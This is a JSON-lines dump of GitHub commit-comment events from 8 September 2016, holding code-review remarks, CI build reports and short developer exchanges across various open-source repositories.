{"id":"4535301294","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948787,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:54:50Z","updated_at":"2016-09-08T16:54:50Z","body":"Or if you have a VPN, I can help with that!"}},"created_at":"2016-09-08T16:54:50Z"}
{"id":"4535301693","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948789,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:54:54Z","updated_at":"2016-09-08T16:54:54Z","body":"Okay dude your awesome"}},"created_at":"2016-09-08T16:54:54Z"}
{"id":"4535302462","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18948792,"position":63,"line":63,"path":"bootstrap.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T16:55:03Z","updated_at":"2016-09-08T16:55:03Z","body":"IIRC it's not as simple as changing the URL, we also have to supply a PAT yes?"}},"created_at":"2016-09-08T16:55:03Z"}
{"id":"4535304046","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18948793,"position":377,"line":586,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T16:55:22Z","updated_at":"2016-09-08T16:55:22Z","body":"timer1 -> плохое название переменной, у нас 3 таймера.\r\ntimer_for_automatic хотя бы так"}},"created_at":"2016-09-08T16:55:22Z"}
{"id":"4535304407","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18948794,"position":null,"line":null,"path":null,"commit_id":"17756adf04e7fe945b03204c8bbd3c89fc6cefdb","created_at":"2016-09-08T16:55:26Z","updated_at":"2016-09-08T16:55:26Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T16:55:26Z"}
{"id":"4535304439","type":"CommitCommentEvent","actor":{"login":"Nigeltiany"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18948795,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T16:55:26Z","updated_at":"2016-09-08T16:55:26Z","body":"It causes problems working without it. Running `gulp lbclient` throws errors\r\n```\r\n    at C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\resolve\\lib\\async.js:46:17\r\n    at process (C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\resolve\\lib\\async.js:173:43)\r\n    at ondir (C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\resolve\\lib\\async.js:188:17)\r\n    at load (C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\resolve\\lib\\async.js:69:43)\r\n    at onex (C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\resolve\\lib\\async.js:92:31)\r\n    at C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\resolve\\lib\\async.js:22:47\r\n    at FSReqWrap.oncomplete (fs.js:123:15)\r\n```\r\nWhy do you suspect pkginfo@0.3.1?"}},"created_at":"2016-09-08T16:55:26Z"}
{"id":"4535305131","type":"CommitCommentEvent","actor":{"login":"oliverkeeble"},"repo":{"name":"oliverkeeble/atom-language-assembly"},"payload":{"comment":{"id":18948796,"position":null,"line":null,"path":null,"commit_id":"ed7bd51f4150cd8d276cb8e0e7e97c6ba4f0709e","created_at":"2016-09-08T16:55:35Z","updated_at":"2016-09-08T16:55:35Z","body":"Oh, for future reference don't manually update the version numbers in this file. It's done automatically by APM when publishing."}},"created_at":"2016-09-08T16:55:35Z"}
{"id":"4535305148","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18948797,"position":null,"line":null,"path":null,"commit_id":"4145efbc54e9aa17a5d34e1ecf3fe61b180e0851","created_at":"2016-09-08T16:55:36Z","updated_at":"2016-09-08T16:55:36Z","body":"All better"}},"created_at":"2016-09-08T16:55:36Z"}
{"id":"4535306640","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18948799,"position":388,"line":597,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T16:55:55Z","updated_at":"2016-09-08T16:55:55Z","body":"опять магическая константа"}},"created_at":"2016-09-08T16:55:55Z"}
{"id":"4535307019","type":"CommitCommentEvent","actor":{"login":"mememori"},"repo":{"name":"quack/quack"},"payload":{"comment":{"id":18948800,"position":null,"line":null,"path":null,"commit_id":"4a70afae75d7029a805494c7db3a19dd03e13264","created_at":"2016-09-08T16:55:58Z","updated_at":"2016-09-08T16:55:58Z","body":":top:"}},"created_at":"2016-09-08T16:55:58Z"}
{"id":"4535308044","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18948802,"position":null,"line":null,"path":null,"commit_id":"50afdf1d23a5af8e7deb2f7bc2fd0cb8b1e6150a","created_at":"2016-09-08T16:56:11Z","updated_at":"2016-09-08T16:56:11Z","body":"thanks. "}},"created_at":"2016-09-08T16:56:11Z"}
{"id":"4535312681","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18948813,"position":null,"line":null,"path":null,"commit_id":"17756adf04e7fe945b03204c8bbd3c89fc6cefdb","created_at":"2016-09-08T16:57:03Z","updated_at":"2016-09-08T16:57:03Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-08T16:57:03Z"}
{"id":"4535314524","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18948815,"position":null,"line":null,"path":null,"commit_id":"9ae9e510ef25144cfbbfa0431ace2cac90fc26c0","created_at":"2016-09-08T16:57:22Z","updated_at":"2016-09-08T16:57:22Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/40/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:174:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:222:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:303:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T16:57:22Z"}
{"id":"4535315586","type":"CommitCommentEvent","actor":{"login":"billsmith"},"repo":{"name":"indeedeng/codecache-datadog"},"payload":{"comment":{"id":18948820,"position":26,"line":26,"path":"src/main/java/com/indeed/example/CodeCacheDataDog.java","commit_id":"7097f4defed57ff4d9c9771528a8c14dd0508ed7","created_at":"2016-09-08T16:57:35Z","updated_at":"2016-09-08T16:57:35Z","body":"I'm happy to do that, but I assumed the reader would understand how to write scheduled code.  The current code shows the essential parts of pulling information out of JMX and sending it to Datadog."}},"created_at":"2016-09-08T16:57:35Z"}
{"id":"4535316734","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18948824,"position":null,"line":null,"path":null,"commit_id":"5092c8bb9c65f5dd0e8a5db2165a0d58aaedd40f","created_at":"2016-09-08T16:57:49Z","updated_at":"2016-09-08T16:57:49Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=65)"}},"created_at":"2016-09-08T16:57:49Z"}
{"id":"4535318735","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18948831,"position":null,"line":null,"path":null,"commit_id":"17756adf04e7fe945b03204c8bbd3c89fc6cefdb","created_at":"2016-09-08T16:58:12Z","updated_at":"2016-09-08T16:58:12Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T16:58:12Z"}
{"id":"4535324586","type":"CommitCommentEvent","actor":{"login":"tgpark"},"repo":{"name":"tgpark/CodeAurora_SWE_Browser"},"payload":{"comment":{"id":18948838,"position":null,"line":null,"path":null,"commit_id":"7b9ccd59c17e27bc6a64ad823f5e9dcce1571781","created_at":"2016-09-08T16:59:17Z","updated_at":"2016-09-08T16:59:17Z","body":"메일 정보는 꼭꼭 숨기고 싶었는데 어차피 git clone 하면 log에 다 나오니... 제길..;;"}},"created_at":"2016-09-08T16:59:17Z"}
{"id":"4535325144","type":"CommitCommentEvent","actor":{"login":"flechoide"},"repo":{"name":"tomato42/tlsfuzzer"},"payload":{"comment":{"id":18948840,"position":null,"line":null,"path":null,"commit_id":"809056a04abe0499c18a320aaa1c528ce1824c2c","created_at":"2016-09-08T16:59:24Z","updated_at":"2016-09-08T16:59:24Z","body":"Yure right, but it states python 2.6 supported, thanks a lot by the way :)"}},"created_at":"2016-09-08T16:59:24Z"}
{"id":"4535326314","type":"CommitCommentEvent","actor":{"login":"escowles"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18948843,"position":75,"line":75,"path":"fcrepo-import/src/main/java/org/fcrepo/importer/SubjectMappingStreamRDF.java","commit_id":"e2c64903b2b8885d7d0cbdddcb841c9d07d9cb26","created_at":"2016-09-08T16:59:37Z","updated_at":"2016-09-08T16:59:37Z","body":"I'm not sure why we would want a StreamRDF instead of just a Sink, when we already have a Sink that puts the Triples in a Graph.  Is there other functionality that would get us?\r\n\r\nIn any event, the [Javadocs for SinkTriplesToGraph](https://jena.apache.org/documentation/javadoc/arq/org/apache/jena/riot/lang/SinkTriplesToGraph.html) leave a lot to be desired, so I looked at the [source code](https://github.com/apache/jena/blob/master/jena-arq/src/main/java/org/apache/jena/riot/lang/SinkTriplesToGraph.java#L74-L82) and it looks like we might want to call both `flush()` and `close()`, since they do different things."}},"created_at":"2016-09-08T16:59:37Z"}
{"id":"4535329863","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18948847,"position":null,"line":null,"path":null,"commit_id":"173be4886977f85bf749c6afade2e3a5a08c69d3","created_at":"2016-09-08T17:00:09Z","updated_at":"2016-09-08T17:00:09Z","body":"Yeah, it was hard to understand. I thought that maybe tables would make this easier (and numbering might be just another column at the left) so we can show there are two sides and don't go back to list of events happening."}},"created_at":"2016-09-08T17:00:09Z"}
{"id":"4535332827","type":"CommitCommentEvent","actor":{"login":"GabLeRoux"},"repo":{"name":"github/hub"},"payload":{"comment":{"id":18948855,"position":null,"line":null,"path":null,"commit_id":"660602b741ba87069604a9286dd68246a7366c0b","created_at":"2016-09-08T17:00:40Z","updated_at":"2016-09-08T17:00:40Z","body":"Awesome, thanks for this :+1: "}},"created_at":"2016-09-08T17:00:40Z"}
{"id":"4535337703","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18948862,"position":null,"line":null,"path":null,"commit_id":"e8d6e673cd4cb235488bdb286f77f8879b024a2d","created_at":"2016-09-08T17:01:32Z","updated_at":"2016-09-08T17:01:32Z","body":"ach und hinsichtlich Google maps ,da dachte ich mir auch dass man die Adresse dann angeben muss \r\naber ich weiß nicht ob des nicht vielleicht zu gefährlich sein könnte, da man ja generell nicht die adressen angeben sollte \r\n\r\naber ich überlegs mir nochmal \r\n\r\nmomentan ist es ja eher wichtiger, dass alle kernfeatures funktionieren "}},"created_at":"2016-09-08T17:01:32Z"}
{"id":"4535338087","type":"CommitCommentEvent","actor":{"login":"cescoffier"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18948864,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T17:01:36Z","updated_at":"2016-09-08T17:01:36Z","body":"I'm not against it if it's correctly done.\r\n\r\nThen, the main question is what does it bring as value: less code, but may feel a bit magic sometimes. So debugging can be harder. \r\n\r\nIf you check on https://github.com/vert-x3/vertx-awesome, there are a couple of dependency injection for Vert.x"}},"created_at":"2016-09-08T17:01:36Z"}
{"id":"4535340545","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18948870,"position":null,"line":null,"path":null,"commit_id":"0fdcd4da51444ea952bc68d7df436c36b721ef94","created_at":"2016-09-08T17:02:03Z","updated_at":"2016-09-08T17:02:03Z","body":"Getting an error when running default gulp task \"gulp\"\r\n![image](https://cloud.githubusercontent.com/assets/17421035/18356774/29527194-75bc-11e6-8f9a-14995d89d7b1.png)\r\n\r\nDo you get this?\r\n\r\n"}},"created_at":"2016-09-08T17:02:03Z"}
{"id":"4535340852","type":"CommitCommentEvent","actor":{"login":"MartinTheriault3333"},"repo":{"name":"AvatarWeb/-furry-octo-invention-."},"payload":{"comment":{"id":18948872,"position":null,"line":null,"path":null,"commit_id":"c1e9cac748beb4048825c1d768e3786f83420a2b","created_at":"2016-09-08T17:02:08Z","updated_at":"2016-09-08T17:02:08Z","body":"Trop de chose dans la tete 1 min 20 invention chaque jour n'es une nouvelle tete vide je dois comencer de nouveaux projet.Me repele pue les application je jai fabriquerces 5 derniere anne jais besion dune equipe de 20 tete pour cheque 2 min de vie plus de QI 163  boucoup d 'invention Gesrionnair de projet requie"}},"created_at":"2016-09-08T17:02:08Z"}
{"id":"4535343035","type":"CommitCommentEvent","actor":{"login":"lance"},"repo":{"name":"bucharest-gold/genet"},"payload":{"comment":{"id":18948880,"position":null,"line":null,"path":null,"commit_id":"f33616091d78a2332f17a66b7c107aa955be2c7b","created_at":"2016-09-08T17:02:31Z","updated_at":"2016-09-08T17:02:31Z","body":"Thanks!"}},"created_at":"2016-09-08T17:02:31Z"}
{"id":"4535347555","type":"CommitCommentEvent","actor":{"login":"nivelle"},"repo":{"name":"nivelle/StudyPlan"},"payload":{"comment":{"id":18948904,"position":null,"line":null,"path":null,"commit_id":"6026e0417606705448855468fd02dea1a4cb2fd6","created_at":"2016-09-08T17:03:22Z","updated_at":"2016-09-08T17:03:22Z","body":"nivelle "}},"created_at":"2016-09-08T17:03:22Z"}
{"id":"4535348473","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948905,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:03:32Z","updated_at":"2016-09-08T17:03:32Z","body":"Thanks... use teamviewer then? "}},"created_at":"2016-09-08T17:03:32Z"}
{"id":"4535348518","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"peonso/tibialegacyserver"},"payload":{"comment":{"id":18948906,"position":null,"line":null,"path":null,"commit_id":"0c95e62c18f6abd3daf65045383a70d970f42b7c","created_at":"2016-09-08T17:03:33Z","updated_at":"2016-09-08T17:03:33Z","body":"Open your client options hahaha mark it to show info messages. :P"}},"created_at":"2016-09-08T17:03:33Z"}
{"id":"4535352347","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948919,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:04:16Z","updated_at":"2016-09-08T17:04:16Z","body":"OK,"}},"created_at":"2016-09-08T17:04:16Z"}
{"id":"4535356364","type":"CommitCommentEvent","actor":{"login":"mark-lunarg"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18948937,"position":141,"line":14080,"path":"tests/layer_validation_tests.cpp","commit_id":"7dfc26bc43179b0aa7adfd74e97ef6353b7b9600","created_at":"2016-09-08T17:05:00Z","updated_at":"2016-09-08T17:05:00Z","body":"We have one that he can test against, at least."}},"created_at":"2016-09-08T17:05:00Z"}
{"id":"4535357029","type":"CommitCommentEvent","actor":{"login":"lance"},"repo":{"name":"bucharest-gold/lightbright"},"payload":{"comment":{"id":18948943,"position":null,"line":null,"path":null,"commit_id":"686148d92e13905ac5bbdb8b87dfc99ec7c266f2","created_at":"2016-09-08T17:05:08Z","updated_at":"2016-09-08T17:05:08Z","body":"Thanks!"}},"created_at":"2016-09-08T17:05:08Z"}
{"id":"4535362505","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"nicolaiarocci/cerberus"},"payload":{"comment":{"id":18948961,"position":22,"line":441,"path":"cerberus/cerberus.py","commit_id":"153fe38b086d8b521ba32f74abca7149df90ae76","created_at":"2016-09-08T17:06:11Z","updated_at":"2016-09-08T17:06:11Z","body":"I think this was a mistake: now calling `__call__` on a Validator that overrides `validate` method will not call its own `validate` anymore."}},"created_at":"2016-09-08T17:06:11Z"}
{"id":"4535365563","type":"CommitCommentEvent","actor":{"login":"Dinosauce"},"repo":{"name":"Dinosauce/290-A1"},"payload":{"comment":{"id":18948965,"position":48,"line":914,"path":"main.cpp","commit_id":"3251325dfb1f6cea775e9a344d9f9a74ba040e0e","created_at":"2016-09-08T17:06:44Z","updated_at":"2016-09-08T17:06:44Z","body":"Step here is 58 while 51 elsewhere in code, change to 51 to represent stairs correctly."}},"created_at":"2016-09-08T17:06:44Z"}
{"id":"4535367709","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18948971,"position":null,"line":null,"path":null,"commit_id":"d62f422e3d951a50bb0b71d0dc69143eace970f9","created_at":"2016-09-08T17:07:09Z","updated_at":"2016-09-08T17:07:09Z","body":"@technoken I replaced some ```OnTouch``` by ```OnTouch_``` and some ```OnTouch_``` by ```OnTouch``` according to our datas.\r\nAdditionnal note, hiding target doesn't execute ```OnTouch_```."}},"created_at":"2016-09-08T17:07:09Z"}
{"id":"4535373018","type":"CommitCommentEvent","actor":{"login":"Dziman"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18948987,"position":7,"line":0,"path":"framework/src/play/src/main/scala/play/api/data/validation/Validation.scala","commit_id":"3be763dafc858d40ac9205baef12a9de91cbb3fe","created_at":"2016-09-08T17:08:09Z","updated_at":"2016-09-08T17:08:09Z","body":"@cchantep scaladoc 2.11.8 works well with such define"}},"created_at":"2016-09-08T17:08:09Z"}
{"id":"4535381765","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18949003,"position":null,"line":null,"path":null,"commit_id":"66a08b44d47e07353d8caa43bb3b8f29ff6e33bb","created_at":"2016-09-08T17:09:49Z","updated_at":"2016-09-08T17:09:49Z","body":"lgtm! thanks!"}},"created_at":"2016-09-08T17:09:49Z"}
{"id":"4535385386","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":18949011,"position":5,"line":67,"path":"src/Plugins/RFC.php","commit_id":"565fc989178a3525f20b0998ddc551a680c18849","created_at":"2016-09-08T17:10:30Z","updated_at":"2016-09-08T17:10:30Z","body":"That should be `$command->getRoom()`?"}},"created_at":"2016-09-08T17:10:30Z"}
{"id":"4535388626","type":"CommitCommentEvent","actor":{"login":"PeeHaa"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":18949020,"position":5,"line":67,"path":"src/Plugins/RFC.php","commit_id":"565fc989178a3525f20b0998ddc551a680c18849","created_at":"2016-09-08T17:11:10Z","updated_at":"2016-09-08T17:11:10Z","body":"Yes ty"}},"created_at":"2016-09-08T17:11:10Z"}
{"id":"4535397633","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18949034,"position":12,"line":12,"path":"src/vs/workbench/common/editor/rangeDecorations.ts","commit_id":"24743e881dd222545a02bd22d1b21fcc89296164","created_at":"2016-09-08T17:12:50Z","updated_at":"2016-09-08T17:12:50Z","body":"@sandy081 please see https://github.com/Microsoft/vscode/wiki/Code-Organization#workbench-parts for this dependency is violating the encapsulation in the workbench. see my change https://github.com/Microsoft/vscode/commit/3375a6d98d80fb4c91522350bdbca54269bc5263 for an alternate solution"}},"created_at":"2016-09-08T17:12:50Z"}
{"id":"4535399460","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949037,"position":31,"line":76,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:13:10Z","updated_at":"2016-09-08T17:13:10Z","body":"glad to see your thought process!"}},"created_at":"2016-09-08T17:13:10Z"}
{"id":"4535401725","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949046,"position":38,"line":83,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:13:34Z","updated_at":"2016-09-08T17:13:34Z","body":"this could be extendable if you passed in the classname"}},"created_at":"2016-09-08T17:13:34Z"}
{"id":"4535402856","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"nicolaiarocci/cerberus"},"payload":{"comment":{"id":18949048,"position":52,"line":124,"path":"UPGRADING.rst","commit_id":"cd25750d017aa899f7a99b20a75af9260a790b6f","created_at":"2016-09-08T17:13:47Z","updated_at":"2016-09-08T17:13:47Z","body":"How would one return a custom error message with that pattern?"}},"created_at":"2016-09-08T17:13:47Z"}
{"id":"4535402991","type":"CommitCommentEvent","actor":{"login":"ekiwi"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949049,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:13:49Z","updated_at":"2016-09-08T17:13:49Z","body":"Using strings as identifiers isn't really the xpcc style, especially since it is not an optional feature and will blow up our code size."}},"created_at":"2016-09-08T17:13:49Z"}
{"id":"4535403190","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18949050,"position":null,"line":null,"path":null,"commit_id":"47d21ea3786e19a3977aa0973e21c3a115d1eb99","created_at":"2016-09-08T17:13:51Z","updated_at":"2016-09-08T17:13:51Z","body":"Forgot to say thanks to in the commit message to @Phatcat for his patience and feedback about those commit.\r\n\r\nThank also to all who answered me when i had questions :) \r\n"}},"created_at":"2016-09-08T17:13:51Z"}
{"id":"4535403716","type":"CommitCommentEvent","actor":{"login":"jankeromnes"},"repo":{"name":"jankeromnes/janitor"},"payload":{"comment":{"id":18949052,"position":null,"line":null,"path":null,"commit_id":"21dd3c2e1bfc5469fe5a161f47efce32830dcee5","created_at":"2016-09-08T17:13:56Z","updated_at":"2016-09-08T17:13:56Z","body":"In newer Docker versions, `devicemapper` is used with a maximum file system size of 10GB, which can't extended on existing images or containers (you'll hit `no space left on device` errors e.g. on `docker build` if you exceed it). You can adjust this maximum with the `dm.basesize` option, but you'll have to delete and rebuild all images that need more space.\r\n\r\nThis is explained [here](http://www.projectatomic.io/blog/2016/03/daemon_option_basedevicesize/)."}},"created_at":"2016-09-08T17:13:56Z"}
{"id":"4535404024","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949054,"position":39,"line":84,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:14:00Z","updated_at":"2016-09-08T17:14:00Z","body":"how could we code this defensively?"}},"created_at":"2016-09-08T17:14:00Z"}
{"id":"4535409667","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949067,"position":53,"line":98,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:15:03Z","updated_at":"2016-09-08T17:15:03Z","body":"how could we code this defensively? "}},"created_at":"2016-09-08T17:15:03Z"}
{"id":"4535410240","type":"CommitCommentEvent","actor":{"login":"tomato42"},"repo":{"name":"tomato42/tlsfuzzer"},"payload":{"comment":{"id":18949069,"position":null,"line":null,"path":null,"commit_id":"809056a04abe0499c18a320aaa1c528ce1824c2c","created_at":"2016-09-08T17:15:11Z","updated_at":"2016-09-08T17:15:11Z","body":"the support for python 2.6 is for the library, not probes, the probes are unsupported :)\r\n\r\nbut I'll fix it in #70 "}},"created_at":"2016-09-08T17:15:11Z"}
{"id":"4535412017","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949074,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:15:30Z","updated_at":"2016-09-08T17:15:30Z","body":"What's the alternative?"}},"created_at":"2016-09-08T17:15:30Z"}
{"id":"4535412265","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18949076,"position":null,"line":null,"path":null,"commit_id":"fb40f1eb2ed0d9dab47712b5d9320cf5a0ffc15d","created_at":"2016-09-08T17:15:33Z","updated_at":"2016-09-08T17:15:33Z","body":"@dyemanov should this be committed in v3 now?"}},"created_at":"2016-09-08T17:15:33Z"}
{"id":"4535414943","type":"CommitCommentEvent","actor":{"login":"MarkMLunarG"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18949080,"position":141,"line":14080,"path":"tests/layer_validation_tests.cpp","commit_id":"7dfc26bc43179b0aa7adfd74e97ef6353b7b9600","created_at":"2016-09-08T17:16:04Z","updated_at":"2016-09-08T17:16:04Z","body":"The failure was caught by our test system. This line is ill formed and not required to complete the test. I have submitted a fix to the test farm and will push the fix as soon as verification is complete"}},"created_at":"2016-09-08T17:16:04Z"}
{"id":"4535417432","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949081,"position":74,"line":119,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:16:32Z","updated_at":"2016-09-08T17:16:32Z","body":"you're doing the same thing in every case here except the first. This is not quite right. Also we could make this code DRY-er; how?"}},"created_at":"2016-09-08T17:16:32Z"}
{"id":"4535418843","type":"CommitCommentEvent","actor":{"login":"funkyfuture"},"repo":{"name":"nicolaiarocci/cerberus"},"payload":{"comment":{"id":18949086,"position":22,"line":441,"path":"cerberus/cerberus.py","commit_id":"153fe38b086d8b521ba32f74abca7149df90ae76","created_at":"2016-09-08T17:16:49Z","updated_at":"2016-09-08T17:16:49Z","body":"this can propably be solved in the metaclass `InspectedValidator`. "}},"created_at":"2016-09-08T17:16:49Z"}
{"id":"4535418878","type":"CommitCommentEvent","actor":{"login":"wcatron"},"repo":{"name":"wcatron/ionic-cloud-sdk-php"},"payload":{"comment":{"id":18949087,"position":21,"line":11,"path":"src/Helpers/HttpHandler.php","commit_id":"bad1f90c294146d6893dbb7e8d86553c37f90e13","created_at":"2016-09-08T17:16:50Z","updated_at":"2016-09-08T17:16:50Z","body":"Yes #4"}},"created_at":"2016-09-08T17:16:50Z"}
